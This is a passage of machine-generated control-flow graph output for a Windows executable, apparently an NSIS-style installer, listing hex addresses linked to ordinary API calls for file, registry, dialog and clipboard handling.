4257->4253 4261 4064ae GetProcAddress GetProcAddress GetProcAddress 4257->4261 4258->4253 4260 4065b1 GlobalFree 4258->4260 4262 4065c7 LoadLibraryA 4260->4262 4263 406709 FreeLibrary 4260->4263 4264 406621 4261->4264 4268 4064d6 4261->4268 4262->4253 4266 4065e1 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4262->4266 4263->4253 4265 40667d FreeLibrary 4264->4265 4267 406656 4264->4267 4265->4267 4266->4264 4271 406716 4267->4271 4276 4066b1 lstrcmpW 4267->4276 4277 4066e2 CloseHandle 4267->4277 4278 406700 CloseHandle 4267->4278 4268->4264 4269 406516 4268->4269 4270 4064fa FreeLibrary GlobalFree 4268->4270 4269->4260 4272 406528 lstrcpyW OpenProcess 4269->4272 4274 40657b CloseHandle CharUpperW lstrcmpW 4269->4274 4270->4253 4273 40671b CloseHandle FreeLibrary 4271->4273 4272->4269 4272->4274 4275 406730 CloseHandle 4273->4275 4274->4264 4274->4269 4275->4273 4276->4267 4276->4275 4277->4267 4278->4263 4279->4250 4280->4254 4281 4044d1 4282 40450b 4281->4282 4283 40453e 4281->4283 4349 405cb0 GetDlgItemTextW 4282->4349 4284 40454b GetDlgItem GetAsyncKeyState 4283->4284 4288 4045dd 4283->4288 4286 40456a GetDlgItem 4284->4286 4299 404588 4284->4299 4291 403d6b 19 API calls 4286->4291 4287 4046c9 4347 40485f 4287->4347 4351 405cb0 GetDlgItemTextW 4287->4351 4288->4287 4296 406831 18 API calls 4288->4296 4288->4347 4289 404516 4290 406064 5 API calls 4289->4290 4292 40451c 4290->4292 4294 40457d ShowWindow 4291->4294 4295 403ea0 5 API calls 4292->4295 4294->4299 4300 404521 GetDlgItem 4295->4300 4301 40465b SHBrowseForFolderW 4296->4301 4297 4046f5 4302 4067aa 18 API calls 4297->4302 4298 403df6 8 API calls 4303 404873 4298->4303 4304 4045a5 SetWindowTextW 4299->4304 4308 405d85 4 API calls 4299->4308 4305 40452f IsDlgButtonChecked 4300->4305 4300->4347 4301->4287 4307 404673 CoTaskMemFree 4301->4307 4312 4046fb 4302->4312 4306 403d6b 19 API calls 4304->4306 4305->4283 4310 4045c3 4306->4310 4311 40674e 3 API calls 4307->4311 4309 40459b 4308->4309 4309->4304 4316 40674e 3 API calls 4309->4316 4313 403d6b 19 API calls 4310->4313 4314 404680 4311->4314 4352 406035 lstrcpynW 4312->4352 4317 4045ce 4313->4317 4318 4046b7 SetDlgItemTextW 4314->4318 4323 406831 18 API calls 4314->4323 4316->4304 4350 403dc4 SendMessageW 4317->4350 4318->4287 4319 404712 4321 406328 3 API calls 4319->4321 4330 40471a 4321->4330 4322 4045d6 4324 406328 3 API calls 4322->4324 4325 40469f lstrcmpiW 4323->4325 4324->4288 4325->4318 4328 4046b0 lstrcatW 4325->4328 4326 40475c 4353 406035 lstrcpynW 4326->4353 4328->4318 4329 404765 4331 405d85 4 API calls 4329->4331 4330->4326 4334 40677d 2 API calls 4330->4334 4336 4047b1 4330->4336 4332 40476b GetDiskFreeSpaceW 4331->4332 4335 40478f MulDiv 4332->4335 4332->4336 4334->4330 4335->4336 4337 40480e 4336->4337 4354 4043d9 4336->4354 4338 404831 4337->4338 4340 40141d 80 API calls 4337->4340 4362 403db1 KiUserCallbackDispatcher 4338->4362 4340->4338 4341 4047ff 4343 404810 SetDlgItemTextW 4341->4343 4344 404804 4341->4344 4343->4337 4346 4043d9 21 API calls 4344->4346 4345 40484d 4345->4347 4363 403d8d 4345->4363 4346->4337 4347->4298 4349->4289 4350->4322 4351->4297 4352->4319 4353->4329 4355 4043f9 4354->4355 4356 406831 18 API calls 4355->4356 4357 404439 4356->4357 4358 406831 18 API calls 4357->4358 4359 404444 4358->4359 4360 406831 18 API calls 4359->4360 4361 404454 lstrlenW wsprintfW SetDlgItemTextW 4360->4361 4361->4341 4362->4345 4364 403da0 SendMessageW 4363->4364 4365 403d9b 4363->4365 4364->4347 4365->4364 4366 401dd3 4367 401446 18 API calls 4366->4367 4368 401dda 4367->4368 4369 401446 18 API calls 4368->4369 4370 4018d3 4369->4370 4371 402e55 4372 40145c 18 API calls 4371->4372 4373 402e63 4372->4373 4374 402e79 4373->4374 4375 40145c 18 API calls 4373->4375 4376 405e5c 2 API calls 4374->4376 4375->4374 4377 402e7f 4376->4377 4401 405e7c GetFileAttributesW CreateFileW 4377->4401 4379 402e8c 4380 402f35 4379->4380 4381 402e98 GlobalAlloc 4379->4381 4384 4062cf 11 API calls 4380->4384 4382 402eb1 4381->4382 4383 402f2c CloseHandle 4381->4383 4402 403368 SetFilePointer 4382->4402 4383->4380 4386 402f45 4384->4386 4388 402f50 DeleteFileW 4386->4388 4389 402f63 4386->4389 4387 402eb7 4390 403336 ReadFile 4387->4390 4388->4389 4403 401435 4389->4403 4392 402ec0 GlobalAlloc 4390->4392 4393 402ed0 4392->4393 4394 402f04 WriteFile GlobalFree 4392->4394 4396 40337f 33 API calls 4393->4396 4395 40337f 33 API calls 4394->4395 4397 402f29 4395->4397 4400 402edd 4396->4400 4397->4383 4399 402efb GlobalFree 4399->4394 4400->4399 4401->4379 4402->4387 4404 404f9e 25 API calls 4403->4404 4405 401443 4404->4405 4406 401cd5 4407 401446 18 API calls 4406->4407 4408 401cdd 4407->4408 4409 401446 18 API calls 4408->4409 4410 401ce8 4409->4410 4411 40145c 18 API calls 4410->4411 4412 401cf1 4411->4412 4413 401d07 lstrlenW 4412->4413 4414 401d43 4412->4414 4415 401d11 4413->4415 4415->4414 4419 406035 lstrcpynW 4415->4419 4417 401d2c 4417->4414 4418 401d39 lstrlenW 4417->4418 4418->4414 4419->4417 4420 402cd7 4421 401446 18 API calls 4420->4421 4423 402c64 4421->4423 4422 402d17 ReadFile 4422->4423 4423->4420 4423->4422 4424 402d99 4423->4424 4425 402dd8 4426 4030e3 4425->4426 4427 402ddf 4425->4427 4428 402de5 FindClose 4427->4428 4428->4426 4429 401d5c 4430 40145c 18 API calls 4429->4430 4431 401d63 4430->4431 4432 40145c 18 API calls 4431->4432 4433 401d6c 4432->4433 4434 401d73 lstrcmpiW 4433->4434 4435 401d86 lstrcmpW 4433->4435 4436 401d79 4434->4436 4435->4436 4437 401c99 4435->4437 4436->4435 4436->4437 4438 4027e3 4439 4027e9 4438->4439 4440 4027f2 4439->4440 4441 402836 4439->4441 4454 401553 4440->4454 4442 40145c 18 API calls 4441->4442 4444 40283d 4442->4444 4446 4062cf 11 API calls 4444->4446 4445 4027f9 4447 40145c 18 API calls 4445->4447 4451 401a13 4445->4451 4448 40284d 4446->4448 4449 40280a RegDeleteValueW 4447->4449 4458 40149d RegOpenKeyExW 4448->4458 4450 4062cf 11 API calls 4449->4450 4453 40282a RegCloseKey 4450->4453 4453->4451 4455 401563 4454->4455 4456 40145c 18 API calls 4455->4456 4457 401589 RegOpenKeyExW 4456->4457 4457->4445 4461 4014c9 4458->4461 4466 401515 4458->4466 4459 4014ef RegEnumKeyW 4460 401501 RegCloseKey 4459->4460 4459->4461 4463 406328 3 API calls 4460->4463 4461->4459 4461->4460 4462 401526 RegCloseKey 4461->4462 4464 40149d 3 API calls 4461->4464 4462->4466 4465 401511 4463->4465 4464->4461 4465->4466 4467 401541 RegDeleteKeyW 4465->4467 4466->4451 4467->4466 4468 4040e4 4469 4040ff 4468->4469 4475 40422d 4468->4475 4471 40413a 4469->4471 4499 403ff6 WideCharToMultiByte 4469->4499 4470 404298 4472 40436a 4470->4472 4473 4042a2 GetDlgItem 4470->4473 4479 403d6b 19 API calls 4471->4479 4480 403df6 8 API calls 4472->4480 4476 40432b 4473->4476 4477 4042bc 4473->4477 4475->4470 4475->4472 4478 404267 GetDlgItem SendMessageW 4475->4478 4476->4472 4481 40433d 4476->4481 4477->4476 4485 4042e2 6 API calls 4477->4485 4504 403db1 KiUserCallbackDispatcher 4478->4504 4483 40417a 4479->4483 4484 404365 4480->4484 4486 404353 4481->4486 4487 404343 SendMessageW 4481->4487 4489 403d6b 19 API calls 4483->4489 4485->4476 4486->4484 4490 404359 SendMessageW 4486->4490 4487->4486 4488 404293 4491 403d8d SendMessageW 4488->4491 4492 404187 CheckDlgButton 4489->4492 4490->4484 4491->4470 4502 403db1 KiUserCallbackDispatcher 4492->4502 4494 4041a5 GetDlgItem 4503 403dc4 SendMessageW 4494->4503 4496 4041bb SendMessageW 4497 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4496->4497 4498 4041d8 GetSysColor 4496->4498 4497->4484 4498->4497 4500 404033 4499->4500 4501 404015 GlobalAlloc WideCharToMultiByte 4499->4501 4500->4471 4501->4500 4502->4494 4503->4496 4504->4488 4505 402ae4 4506 402aeb 4505->4506 4507 4030e3 4505->4507 4508 402af2 CloseHandle 4506->4508 4508->4507 4509 402065 4510 401446 18 API calls 4509->4510 4511 40206d 4510->4511 4512 401446 18 API calls 4511->4512 4513 402076 GetDlgItem 4512->4513 4514 4030dc 4513->4514 4515 4030e3 4514->4515 4517 405f7d wsprintfW 4514->4517 4517->4515 4518 402665 4519 40145c 18 API calls 4518->4519 4520 40266b 4519->4520 4521 40145c 18 API calls 4520->4521 4522 402674 4521->4522 4523 40145c 18 API calls 4522->4523 4524 40267d 4523->4524 4525 4062cf 11 API calls 4524->4525 4526 40268c 4525->4526 4527 406301 2 API calls 4526->4527 4528 402695 4527->4528 4529 4026a6 lstrlenW lstrlenW 4528->4529 4531 404f9e 25 API calls 4528->4531 4533 4030e3 4528->4533 4530 404f9e 25 API calls 4529->4530 4532 4026e8 SHFileOperationW 4530->4532 4531->4528 4532->4528 4532->4533 4534 401c69 4535 40145c 18 API calls 4534->4535 4536 401c70 4535->4536 4537 4062cf 11 API calls 4536->4537 4538 401c80 4537->4538 4539 405ccc MessageBoxIndirectW 4538->4539 4540 401a13 4539->4540 4541 402f6e 4542 402f72 4541->4542 4543 402fae 4541->4543 4545 4062cf 11 API calls 4542->4545 4544 40145c 18 API calls 4543->4544 4551 402f9d 4544->4551 4546 402f7d 4545->4546 4547 4062cf 11 API calls 4546->4547 4548 402f90 4547->4548 4549 402fa2 4548->4549 4550 402f98 4548->4550 4553 406113 9 API calls 4549->4553 4552 403ea0 5 API calls 4550->4552 4552->4551 4553->4551 4554 4023f0 4555 402403 4554->4555 4556 4024da 4554->4556 4557 40145c 18 API calls 4555->4557 4558 404f9e 25 API calls 4556->4558 4559 40240a 4557->4559 4562 4024f1 4558->4562 4560 40145c 18 API calls 4559->4560 4561 402413 4560->4561 4563 402429 LoadLibraryExW 4561->4563 4564 40241b GetModuleHandleW 4561->4564 4565 4024ce 4563->4565 4566 40243e 4563->4566 4564->4563 4564->4566 4568 404f9e 25 API calls 4565->4568 4578 406391 GlobalAlloc WideCharToMultiByte 4566->4578 4568->4556 4569 402449 4570 40248c 4569->4570 4571 40244f 4569->4571 4572 404f9e 25 API calls 4570->4572 4573 401435 25 API calls 4571->4573 4576 40245f 4571->4576 4574 402496 4572->4574 4573->4576 4575 4062cf 11 API calls 4574->4575 4575->4576 4576->4562 4577 4024c0 FreeLibrary 4576->4577 4577->4562 4579 4063c9 GlobalFree 4578->4579 4580 4063bc GetProcAddress 4578->4580 4579->4569 4580->4579 3417 402175 3427 401446 3417->3427 3419 40217c 3420 401446 18 API calls 3419->3420 3421 402186 3420->3421 3422 402197 3421->3422 3425 4062cf 11 API calls 3421->3425 3423 4021aa EnableWindow 3422->3423 3424 40219f ShowWindow 3422->3424 3426 4030e3 3423->3426 3424->3426 3425->3422 3428 406831 18 API calls 3427->3428 3429 401455 3428->3429 3429->3419 4581 4048f8 4582 404906 4581->4582 4583 40491d 4581->4583 4584 40490c 4582->4584 4599 404986 4582->4599 4585 40492b IsWindowVisible 4583->4585 4591 404942 4583->4591 4586 403ddb SendMessageW 4584->4586 4588 404938 4585->4588 4585->4599 4589 404916 4586->4589 4587 40498c CallWindowProcW 4587->4589 4600 40487a SendMessageW 4588->4600 4591->4587 4605 406035 lstrcpynW 4591->4605 4593 404971 4606 405f7d wsprintfW 4593->4606 4595 404978 4596 40141d 80 API calls 4595->4596 4597 40497f 4596->4597 4607 406035 lstrcpynW 4597->4607 4599->4587 4601 4048d7 SendMessageW 4600->4601 4602 40489d GetMessagePos ScreenToClient SendMessageW 4600->4602 4604 4048cf 4601->4604 4603 4048d4 4602->4603 4602->4604 4603->4601 4604->4591 4605->4593 4606->4595 4607->4599 3722 4050f9 3723 4052c1 3722->3723 3724 40511a GetDlgItem GetDlgItem GetDlgItem 3722->3724 3725 4052f2 3723->3725 3726 4052ca GetDlgItem CreateThread CloseHandle 3723->3726 3771 403dc4 SendMessageW 3724->3771 3728 405320 3725->3728 3730 405342 3725->3730 3731 40530c ShowWindow ShowWindow 3725->3731 3726->3725 3774 405073 OleInitialize 3726->3774 3732 40537e 3728->3732 3734 405331 3728->3734 3735 405357 ShowWindow 3728->3735 3729 40518e 3741 406831 18 API calls 3729->3741 3736 403df6 8 API calls 3730->3736 3773 403dc4 SendMessageW 3731->3773 3732->3730 3737 405389 SendMessageW 3732->3737 3738 403d44 SendMessageW 3734->3738 3739 405377 3735->3739 3740 405369 3735->3740 3746 4052ba 3736->3746 3745 4053a2 CreatePopupMenu 3737->3745 3737->3746 3738->3730 3744 403d44 SendMessageW 3739->3744 3742 404f9e 25 API calls 3740->3742 3743 4051ad 3741->3743 3742->3739 3747 4062cf 11 API calls 3743->3747 3744->3732 3748 406831 18 API calls 3745->3748 3749 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3747->3749 3750 4053b2 AppendMenuW 3748->3750 3751 405203 SendMessageW SendMessageW 3749->3751 3752 40521f 3749->3752 3753 4053c5 GetWindowRect 3750->3753 3754 4053d8 3750->3754 3751->3752 3755 405232 3752->3755 3756 405224 SendMessageW 3752->3756 3757 4053df TrackPopupMenu 3753->3757 3754->3757 3758 403d6b 19 API calls 3755->3758 3756->3755 3757->3746 3759 4053fd 3757->3759 3760 405242 3758->3760 3761 405419 SendMessageW 3759->3761 3762 40524b ShowWindow 3760->3762 3763 40527f GetDlgItem SendMessageW 3760->3763 3761->3761 3764 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3761->3764 3765 405261 ShowWindow 3762->3765 3766 40526e 3762->3766 3763->3746 3767 4052a2 SendMessageW SendMessageW 3763->3767 3768 40545b SendMessageW 3764->3768 3765->3766 3772 403dc4 SendMessageW 3766->3772 3767->3746 3768->3768 3769 405486 GlobalUnlock SetClipboardData CloseClipboard 3768->3769 3769->3746 3771->3729 3772->3763 3773->3728 3775 403ddb SendMessageW 3774->3775 3779 405096 3775->3779 3776 403ddb SendMessageW 3777 4050d1 OleUninitialize 3776->3777 3778 4062cf 11 API calls 3778->3779 3779->3778 3780 40139d 80 API calls 3779->3780 3781 4050c1 3779->3781 3780->3779 3781->3776 4608 4020f9 GetDC GetDeviceCaps 4609 401446 18 API calls 4608->4609 4610 402116 MulDiv 4609->4610 4611 401446 18 API calls 4610->4611 4612 40212c 4611->4612 4613 406831 18 API calls 4612->4613 4614 402165 CreateFontIndirectW 4613->4614 4615 4030dc 4614->4615 4616 4030e3 4615->4616 4618 405f7d wsprintfW 4615->4618 4618->4616 4619 4024fb 4620 40145c 18 API calls 4619->4620 4621 402502 4620->4621 4622 40145c 18 API calls 4621->4622 4623 40250c 4622->4623 4624 40145c 18 API calls 4623->4624 4625 402515 4624->4625 4626 40145c 18 API calls 4625->4626 4627 40251f 4626->4627 4628 40145c 18 API calls 4627->4628 4629 402529 4628->4629 4630 40253d 4629->4630 4631 40145c 18 API calls 4629->4631 4632 4062cf 11 API calls 4630->4632 4631->4630 4633 40256a CoCreateInstance 4632->4633 4634 40258c 4633->4634 4635 4026fc 4637 402708 4635->4637 4638 401ee4 4635->4638 4636 406831 18 API calls 4636->4638 4638->4635 4638->4636 3782 4019fd 3783 40145c 18 API calls 3782->3783 3784 401a04 3783->3784 3787 405eab 3784->3787 3788 405eb8 GetTickCount GetTempFileNameW 3787->3788 3789 401a0b 3788->3789 3790 405eee 3788->3790 3790->3788 3790->3789 4639 4022fd 4640 40145c 18 API calls 4639->4640 4641 402304 GetFileVersionInfoSizeW 4640->4641 4642 4030e3 4641->4642 4643 40232b GlobalAlloc 4641->4643 4643->4642 4644 40233f GetFileVersionInfoW 4643->4644 4645 402350 VerQueryValueW 4644->4645 4646 402381 GlobalFree 4644->4646 4645->4646 4647 402369 4645->4647 4646->4642 4652 405f7d wsprintfW 4647->4652 4650 402375 4653 405f7d wsprintfW 4650->4653 4652->4650 4653->4646 4654 402afd 4655 40145c 18 API calls 4654->4655 4656 402b04 4655->4656 4661 405e7c GetFileAttributesW CreateFileW 4656->4661 4658 402b10 4659 4030e3 4658->4659 4662 405f7d wsprintfW 4658->4662 4661->4658 4662->4659 4663 4029ff 4664 401553 19 API calls 4663->4664 4665 402a09 4664->4665 4666 40145c 18 API calls 4665->4666 4667 402a12 4666->4667 4668 402a1f RegQueryValueExW 4667->4668 4672 401a13 4667->4672 4669 402a45 4668->4669 4670 402a3f 4668->4670 4671 4029e4 RegCloseKey 4669->4671 4669->4672 4670->4669 4674 405f7d wsprintfW 4670->4674 4671->4672 4674->4669 4675 401000 4676 401037 BeginPaint GetClientRect 4675->4676 4677 40100c DefWindowProcW 4675->4677 4679 4010fc 4676->4679 4680 401182 4677->4680 4681 401073 CreateBrushIndirect FillRect DeleteObject 4679->4681 4682 401105 4679->4682 4681->4679 4683 401170 EndPaint 4682->4683 4684 40110b CreateFontIndirectW 4682->4684 4683->4680 4684->4683 4685 40111b 6 API calls 4684->4685 4685->4683 4686 401f80 4687 401446 18 API calls 4686->4687 4688 401f88 4687->4688 4689 401446 18 API calls 4688->4689 4690 401f93 4689->4690 4691 401fa3 4690->4691 4692 40145c 18 API calls 4690->4692 4693 401fb3 4691->4693 4694 40145c 18 API calls 4691->4694 4692->4691 4695 402006 4693->4695 4696 401fbc 4693->4696 4694->4693 4697 40145c 18 API calls 4695->4697 4698 401446 18 API calls 4696->4698 4699 40200d 4697->4699 4700 401fc4 4698->4700 4702 40145c 18 API calls 4699->4702 4701 401446 18 API calls 4700->4701 4703 401fce 4701->4703 4704 402016 FindWindowExW 4702->4704 4705 401ff6 SendMessageW 4703->4705 4706 401fd8 SendMessageTimeoutW 4703->4706 4708 402036 4704->4708 4705->4708 4706->4708 4707 4030e3 4708->4707 4710 405f7d wsprintfW 4708->4710 4710->4707 4711 402880 4712 402884 4711->4712 4713 40145c 18 API calls 4712->4713 4714 4028a7 4713->4714 4715 40145c 18 API calls 4714->4715 4716 4028b1 4715->4716 4717 4028ba RegCreateKeyExW 4716->4717 4718 4028e8 4717->4718 4723 4029ef 4717->4723 4719 402934 4718->4719 4721 40145c 18 API calls 4718->4721 4720 402963 4719->4720 4722 401446 18 API calls 4719->4722 4724 4029ae RegSetValueExW 4720->4724 4727 40337f 33 API calls 4720->4727 4725 4028fc lstrlenW 4721->4725 4726 402947 4722->4726 4730 4029c6 RegCloseKey 4724->4730 4731 4029cb 4724->4731 4728 402918 4725->4728 4729 40292a 4725->4729 4733 4062cf 11 API calls 4726->4733 4734 40297b 4727->4734 4735 4062cf 11 API calls 4728->4735 4736 4062cf 11 API calls 4729->4736 4730->4723 4732 4062cf 11 API calls 4731->4732 4732->4730 4733->4720 4742 406250 4734->4742 4739 402922 4735->4739 4736->4719 4739->4724 4741 4062cf 11 API calls 4741->4739 4743 406273 4742->4743 4744 4062b6 4743->4744 4745 406288 wsprintfW 4743->4745 4746 402991 4744->4746 4747 4062bf lstrcatW 4744->4747 4745->4744 4745->4745 4746->4741 4747->4746 4748 403d02 4749 403d0d 4748->4749 4750 403d11 4749->4750 4751 403d14 GlobalAlloc 4749->4751 4751->4750 4752 402082 4753 401446 18 API calls 4752->4753 4754 402093 SetWindowLongW 4753->4754 4755 4030e3 4754->4755 4756 402a84 4757 401553 19 API calls 4756->4757 4758 402a8e 4757->4758 4759 401446 18 API calls 4758->4759 4760 402a98 4759->4760 4761 401a13 4760->4761 4762 402ab2 RegEnumKeyW 4760->4762 4763 402abe RegEnumValueW 4760->4763 4764 402a7e 4762->4764 4763->4761 4763->4764 4764->4761 4765 4029e4 RegCloseKey 4764->4765 4765->4761 4766 402c8a 4767 402ca2 4766->4767 4768 402c8f 4766->4768 4770 40145c 18 API calls 4767->4770 4769 401446 18 API calls 4768->4769 4772 402c97 4769->4772 4771 402ca9 lstrlenW 4770->4771 4771->4772 4773 401a13 4772->4773 4774 402ccb WriteFile 4772->4774 4774->4773 4775 401d8e 4776 40145c 18 API calls 4775->4776 4777 401d95 ExpandEnvironmentStringsW 4776->4777 4778 401da8 4777->4778 4779 401db9 4777->4779 4778->4779 4780 401dad lstrcmpW 4778->4780 4780->4779 4781 401e0f 4782 401446 18 API calls 4781->4782 4783 401e17 4782->4783 4784 401446 18 API calls 4783->4784 4785 401e21 4784->4785 4786 4030e3 4785->4786 4788 405f7d wsprintfW 4785->4788 4788->4786 4789 40438f 4790 4043c8 4789->4790 4791 40439f 4789->4791 4792 403df6 8 API calls 4790->4792 4793 403d6b 19 API calls 4791->4793 4795 4043d4 4792->4795 4794 4043ac SetDlgItemTextW 4793->4794 4794->4790 4796 403f90 4797 403fa0 4796->4797 4798 403fbc 4796->4798 4807 405cb0 GetDlgItemTextW 4797->4807 4800 403fc2 SHGetPathFromIDListW 4798->4800 4801 403fef 4798->4801 4803 403fd2 4800->4803 4806 403fd9 SendMessageW 4800->4806 4802 403fad SendMessageW 4802->4798 4804 40141d 80 API calls 4803->4804 4804->4806 4806->4801 4807->4802 4808 402392 4809 40145c 18 API calls 4808->4809 4810 402399 4809->4810 4813 407224 4810->4813 4814 406efe 25 API calls 4813->4814 4815 407244 4814->4815 4816 4023a7 4815->4816 4817 40724e lstrcpynW lstrcmpW 4815->4817 4818 407280 4817->4818 4819 407286 lstrcpynW 4817->4819 4818->4819 4819->4816 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3403 406113 3360->3403 3372 40683e 3363->3372 3364 406aab 3365 401488 3364->3365 3398 406035 lstrcpynW 3364->3398 3365->3358 3382 406064 3365->3382 3367 4068ff GetVersion 3377 40690c 3367->3377 3368 406a72 lstrlenW 3368->3372 3370 406831 10 API calls 3370->3368 3372->3364 3372->3367 3372->3368 3372->3370 3375 406064 5 API calls 3372->3375 3396 405f7d wsprintfW 3372->3396 3397 406035 lstrcpynW 3372->3397 3374 40697e GetSystemDirectoryW 3374->3377 3375->3372 3376 406991 GetWindowsDirectoryW 3376->3377 3377->3372 3377->3374 3377->3376 3378 406831 10 API calls 3377->3378 3379 406a0b lstrcatW 3377->3379 3380 4069c5 SHGetSpecialFolderLocation 3377->3380 3391 405eff RegOpenKeyExW 3377->3391 3378->3377 3379->3372 3380->3377 3381 4069dd SHGetPathFromIDListW CoTaskMemFree 3380->3381 3381->3377 3389 406071 3382->3389 3383 4060e7 3384 4060ed CharPrevW 3383->3384 3386 40610d 3383->3386 3384->3383 3385 4060da CharNextW 3385->3383 3385->3389 3386->3358 3388 4060c6 CharNextW 3388->3389 3389->3383 3389->3385 3389->3388 3390 4060d5 CharNextW 3389->3390 3399 405d32 3389->3399 3390->3385 3392 405f33 RegQueryValueExW 3391->3392 3393 405f78 3391->3393 3394 405f55 RegCloseKey 3392->3394 3393->3377 3394->3393 3396->3372 3397->3372 3398->3365 3400 405d38 3399->3400 3401 405d4e 3400->3401 3402 405d3f CharNextW 3400->3402 3401->3389 3402->3400 3404 40613c 3403->3404 3405 40611f 3403->3405 3407 4061b3 3404->3407 3408 406159 3404->3408 3409 40277f WritePrivateProfileStringW 3404->3409 3406 406129 CloseHandle 3405->3406 3405->3409 3406->3409 3407->3409 3410 4061bc lstrcatW lstrlenW WriteFile 3407->3410 3408->3410 3411 406162 GetFileAttributesW 3408->3411 3410->3409 3416 405e7c GetFileAttributesW CreateFileW 3411->3416 3413 40617e 3413->3409 3414 4061a8 SetFilePointer 3413->3414 3415 40618e WriteFile 3413->3415 3414->3407 3415->3414 3416->3413 4820 402797 4821 40145c 18 API calls 4820->4821 4822 4027ae 4821->4822 4823 40145c 18 API calls 4822->4823 4824 4027b7 4823->4824 4825 40145c 18 API calls 4824->4825 4826 4027c0 GetPrivateProfileStringW lstrcmpW 4825->4826 4827 401e9a 4828 40145c 18 API calls 4827->4828 4829 401ea1 4828->4829 4830 401446 18 API calls 4829->4830 4831 401eab wsprintfW 4830->4831 3791 401a1f 3792 40145c 18 API calls 3791->3792 3793 401a26 3792->3793 3794 4062cf 11 API calls 3793->3794 3795 401a49 3794->3795 3796 401a64 3795->3796 3797 401a5c 3795->3797 3866 406035 lstrcpynW 3796->3866 3865 406035 lstrcpynW 3797->3865 3800 401a6f 3867 40674e lstrlenW CharPrevW 3800->3867 3801 401a62 3804 406064 5 API calls 3801->3804 3835 401a81 3804->3835 3805 406301 2 API calls 3805->3835 3808 401a98 CompareFileTime 3808->3835 3809 401ba9 3810 404f9e 25 API calls 3809->3810 3812 401bb3 3810->3812 3811 401b5d 3813 404f9e 25 API calls 3811->3813 3844 40337f 3812->3844 3815 401b70 3813->3815 3819 4062cf 11 API calls 3815->3819 3817 406035 lstrcpynW 3817->3835 3818 4062cf 11 API calls 3820 401bda 3818->3820 3824 401b8b 3819->3824 3821 401be9 SetFileTime 3820->3821 3822 401bf8 CloseHandle 3820->3822 3821->3822 3822->3824 3825 401c09 3822->3825 3823 406831 18 API calls 3823->3835 3826 401c21 3825->3826 3827 401c0e 3825->3827 3828 406831 18 API calls 3826->3828 3829 406831 18 API calls 3827->3829 3830 401c29 3828->3830 3832 401c16 lstrcatW 3829->3832 3833 4062cf 11 API calls 3830->3833 3832->3830 3836 401c34 3833->3836 3834 401b50 3838 401b93 3834->3838 3839 401b53 3834->3839 3835->3805 3835->3808 3835->3809 3835->3811 3835->3817 3835->3823 3835->3834 3837 4062cf 11 API calls 3835->3837 3843 405e7c GetFileAttributesW CreateFileW 3835->3843 3870 405e5c GetFileAttributesW 3835->3870 3873 405ccc 3835->3873 3840 405ccc MessageBoxIndirectW 3836->3840 3837->3835 3841 4062cf 11 API calls 3838->3841 3842 4062cf 11 API calls 3839->3842 3840->3824 3841->3824 3842->3811 3843->3835 3845 40339a 3844->3845 3846 4033c7 3845->3846 3879 403368 SetFilePointer 3845->3879 3877 403336 ReadFile 3846->3877 3850 401bc6 3850->3818 3851 403546 3853 40354a 3851->3853 3854 40356e 3851->3854 3852 4033eb GetTickCount 3852->3850 3857 403438 3852->3857 3855 403336 ReadFile 3853->3855 3854->3850 3858 403336 ReadFile 3854->3858 3859 40358d WriteFile 3854->3859 3855->3850 3856 403336 ReadFile 3856->3857 3857->3850 3857->3856 3861 40348a GetTickCount 3857->3861 3862 4034af MulDiv wsprintfW 3857->3862 3864 4034f3 WriteFile 3857->3864 3858->3854 3859->3850 3860 4035a1 3859->3860 3860->3850 3860->3854 3861->3857 3863 404f9e 25 API calls 3862->3863 3863->3857 3864->3850 3864->3857 3865->3801 3866->3800 3868 401a75 lstrcatW 3867->3868 3869 40676b lstrcatW 3867->3869 3868->3801 3869->3868 3871 405e79 3870->3871 3872 405e6b SetFileAttributesW 3870->3872 3871->3835 3872->3871 3874 405ce1 3873->3874 3875 405d2f 3874->3875 3876 405cf7 MessageBoxIndirectW 3874->3876 3875->3835 3876->3875 3878 403357 3877->3878 3878->3850 3878->3851 3878->3852 3879->3846 4832 40209f GetDlgItem GetClientRect 4833 40145c 18 API calls 4832->4833 4834 4020cf LoadImageW SendMessageW 4833->4834 4835 4030e3 4834->4835 4836 4020ed DeleteObject 4834->4836 4836->4835 4837 402b9f 4838 401446 18 API calls 4837->4838 4842 402ba7 4838->4842 4839 402c4a 4840 402bdf ReadFile 4840->4842 4849 402c3d 4840->4849 4841 401446 18 API calls 4841->4849 4842->4839 4842->4840 4843 402c06 MultiByteToWideChar 4842->4843 4844 402c3f 4842->4844 4845 402c4f 4842->4845 4842->4849 4843->4842 4843->4845 4850 405f7d wsprintfW 4844->4850 4847 402c6b SetFilePointer 4845->4847 4845->4849 4847->4849 4848 402d17 ReadFile 4848->4849 4849->4839 4849->4841 4849->4848 4850->4839 4851 402b23 GlobalAlloc 4852 402b39 4851->4852 4853 402b4b 4851->4853 4854 401446 18 API calls 4852->4854 4855 40145c 18 API calls 4853->4855 4857 402b41 4854->4857 4856 402b52 WideCharToMultiByte lstrlenA 4855->4856 4856->4857 4858 402b84 WriteFile 4857->4858 4859 402b93 4857->4859 4858->4859 4860 402384 GlobalFree 4858->4860 4860->4859 4862 4040a3 4863 4040b0 lstrcpynW lstrlenW 4862->4863 4864 4040ad 4862->4864 4864->4863 3430 4054a5 3431 4055f9 3430->3431 3432 4054bd 3430->3432 3434 40564a 3431->3434 3435 40560a GetDlgItem GetDlgItem 3431->3435 3432->3431 3433 4054c9 3432->3433 3437 4054d4 SetWindowPos 3433->3437 3438 4054e7 3433->3438 3436 4056a4 3434->3436 3444 40139d 80 API calls 3434->3444 3439 403d6b 19 API calls 3435->3439 3445 4055f4 3436->3445 3500 403ddb 3436->3500 3437->3438 3441 405504 3438->3441 3442 4054ec ShowWindow 3438->3442 3443 405634 SetClassLongW 3439->3443 3446 405526 3441->3446 3447 40550c DestroyWindow 3441->3447 3442->3441 3448 40141d 80 API calls 3443->3448 3451 40567c 3444->3451 3449 40552b 